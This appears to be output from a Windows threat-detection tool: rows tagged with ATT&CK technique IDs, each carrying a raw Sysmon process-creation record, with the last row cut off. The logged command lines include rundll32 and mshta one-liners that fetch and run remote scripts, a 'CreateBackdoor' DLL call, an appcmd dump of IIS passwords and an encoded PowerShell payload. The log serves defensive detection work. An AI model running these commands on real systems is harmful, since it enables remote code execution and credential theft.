"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1601936900.530243,2020-10-06T02:28:20.530243+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
2164913
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2020-10-05 22:28:20.529
00247C92-9E04-5F7B-0000-0010CF98272C
12876
C:\Windows\System32\cmd.exe
10.0.18362.449 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
"C:\windows\system32\cmd.exe"
C:\windows\system32\
LAPTOP-JU4M3I0E\bouss
00247C92-8C36-5F75-0000-002034E39103
0x391e334
2
High
SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
00247C92-9E03-5F7B-0000-0010A645272C
20228
C:\Windows\System32\mmc.exe
"C:\Windows\System32\mmc.exe" WF.msc
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969966.981641,2019-05-27T19:12:46.981641+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1,"
1
5
4
1
0
0x8000000000000000
6177
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 15:12:45.437
365ABB72-FE6D-5CEB-0000-0010122D0C00
1636
C:\Windows\System32\wbem\WMIC.exe
6.1.7600.16385 (win7_rtm.090713-1255)
WMI Commandline Utility
Microsoft® Windows® Operating System
Microsoft Corporation
C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state
C:\Windows\system32\
NT AUTHORITY\SYSTEM
365ABB72-7B40-5CEC-0000-0020E7030000
0x3e7
0
System
SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443
365ABB72-FE6D-5CEB-0000-0010332A0C00
3876
C:\Windows\System32\cmd.exe
cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state
",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1,"
1
5
4
1
0
0x8000000000000000
424175
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:21.693
747F3D96-51FD-5F93-0000-00103B425E00
7504
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51F9-5F93-0000-0010551E5E00
9116
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
4904
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:18.451
747F3D96-661E-5D3F-0000-00107F248700
3164
C:\Windows\System32\mshta.exe
11.00.17763.1 (WinBuild.160101.0800)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F
747F3D96-661E-5D3F-0000-0010A3148700
776
C:\Windows\System32\cmd.exe
cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
1
5
4
1
0
0x8000000000000000
243527
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.682
747F3D96-9F61-5E75-0000-001059841E00
8076
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1,"
1
5
4
1
0
0x8000000000000000
424175
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-10-23 21:58:21.693
747F3D96-51FD-5F93-0000-00103B425E00
7504
C:\Windows\SysWOW64\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-4690-5F93-0000-002019A60800
0x8a619
1
Medium
SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
747F3D96-51F9-5F93-0000-0010551E5E00
9116
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);)",1,"
1
5
4
1
0
0x8000000000000000
4126
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 15:32:57.276
365ABB72-1A29-5CE4-0000-00107BE42101
2920
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-39CC-5CE3-0000-002096C70000
0xc796
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-1A29-5CE4-0000-001054E32101
1532
C:\Windows\System32\cmd.exe
cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1,"
1
5
4
1
0
0x8000000000000000
4904
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-29 21:33:18.451
747F3D96-661E-5D3F-0000-00107F248700
3164
C:\Windows\System32\mshta.exe
11.00.17763.1 (WinBuild.160101.0800)
Microsoft (R) HTML Application host
Internet Explorer
Microsoft Corporation
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-6053-5D3F-0000-002082314100
0x413182
1
High
SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F
747F3D96-661E-5D3F-0000-0010A3148700
776
C:\Windows\System32\cmd.exe
cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243527
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.682
747F3D96-9F61-5E75-0000-001059841E00
8076
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564845391.87585,2019-08-03T19:16:31.875850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
1
5
4
1
0
0x8000000000000000
5536
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-08-03 15:16:31.676
747F3D96-A54F-5D45-0000-0010D83FA101
1716
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\
MSEDGEWIN10\IEUser
747F3D96-56A3-5D45-0000-0020B3D31800
0x18d3b3
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-A54F-5D45-0000-0010C429A101
6080
C:\Windows\System32\dllhost.exe
C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1,"
1
5
4
1
0
0x8000000000000000
4126
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 15:32:57.276
365ABB72-1A29-5CE4-0000-00107BE42101
2920
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-39CC-5CE3-0000-002096C70000
0xc796
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-1A29-5CE4-0000-001054E32101
1532
C:\Windows\System32\cmd.exe
cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,Critical,"Found User (LAPTOP-JU4M3I0E\bouss) run Suspicious PowerShell commands that include (powershell,.cmd) in event with Command Line (powershell.exe start-process notepad.exe) and Parent Image :C:\Windows\SysWOW64\cmd.exe , Parent CommandLine ("C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd) in directory : ( C:\Users\bouss\source\repos\blabla\blabla\ )",1,"
1
5
4
1
0
0x8000000000000000
2429138
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2021-01-26 13:21:14.021
00247C92-174A-6010-0000-0010C0B2D92E
18548
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
10.0.18362.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
PowerShell.EXE
powershell.exe start-process notepad.exe
C:\Users\bouss\source\repos\blabla\blabla\
LAPTOP-JU4M3I0E\bouss
00247C92-5082-600D-0000-0020A246F726
0x26f746a2
5
Medium
SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A
00247C92-1749-6010-0000-0010EFAAD92E
23168
C:\Windows\SysWOW64\cmd.exe
"C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
1
5
4
1
0
0x8000000000000000
243527
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2020-03-21 05:00:17.682
747F3D96-9F61-5E75-0000-001059841E00
8076
C:\Windows\System32\rundll32.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
RUNDLL32.EXE
rundll32 windowscoredeviceinfo.dll,CreateBackdoor
C:\Windows\system32\
NT AUTHORITY\SYSTEM
747F3D96-9DBA-5E75-0000-0020E7030000
0x3e7
0
System
SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
747F3D96-9DBC-5E75-0000-00102C390100
1652
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602619902.353945,2020-10-14T00:11:42.353945+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"
1
5
4
1
0
0x8000000000000000
2196443
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2020-10-13 20:11:42.277
00247C92-09FE-5F86-0000-0010AD861401
7648
C:\Windows\System32\cmd.exe
10.0.18362.449 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
Cmd.Exe
c:\windows\system32\cmd.exe
c:\Windows\System32\
LAPTOP-JU4M3I0E\bouss
00247C92-DE70-5F85-0000-002059F80600
0x6f859
1
Medium
SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
00247C92-09FE-5F86-0000-001051841401
1716
C:\Windows\System32\wuauclt.exe
wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer
",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1,"
1
5
4
1
0
0x8000000000000000
4126
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-21 15:32:57.276
365ABB72-1A29-5CE4-0000-00107BE42101
2920
C:\Windows\System32\rundll32.exe
6.1.7600.16385 (win7_rtm.090713-1255)
Windows host process (Rundll32)
Microsoft® Windows® Operating System
Microsoft Corporation
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
C:\Users\IEUser\Desktop\
IEWIN7\IEUser
365ABB72-39CC-5CE3-0000-002096C70000
0xc796
1
High
SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
365ABB72-1A29-5CE4-0000-001054E32101
1532
C:\Windows\System32\cmd.exe
cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.5225,2019-05-27T05:29:18.522500+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1,"
1
5
4
1
0
0x8000000000000000
5928
Microsoft-Windows-Sysmon/Operational
IEWIN7
2019-05-27 01:29:18.472
365ABB72-3D6E-5CEB-0000-0010CC99FF00
344
C:\Windows\System32\inetsrv\appcmd.exe
7.5.7600.16385 (win7_rtm.090713-1255)
Application Server Command Line Admin Tool
Internet Information Services
Microsoft Corporation
"C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password
C:\Windows\Temp\
IIS APPPOOL\DefaultAppPool
365ABB72-B26B-5CEA-0000-002023240800
0x82423
0
High
SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
365ABB72-3D4A-5CEB-0000-0010FA93FD00
2584
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABl
AD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,High,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe start-process notepad.exe ),1,"
1
5
4
1
0
0x8000000000000000
2429138
Microsoft-Windows-Sysmon/Operational
LAPTOP-JU4M3I0E
2021-01-26 13:21:14.021
00247C92-174A-6010-0000-0010C0B2D92E
18548
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
10.0.18362.1 (WinBuild.160101.0800)
Windows PowerShell
Microsoft® Windows® Operating System
Microsoft Corporation
PowerShell.EXE
powershell.exe start-process notepad.exe
C:\Users\bouss\source\repos\blabla\blabla\
LAPTOP-JU4M3I0E\bouss
00247C92-5082-600D-0000-0020A246F726
0x26f746a2
5
Medium
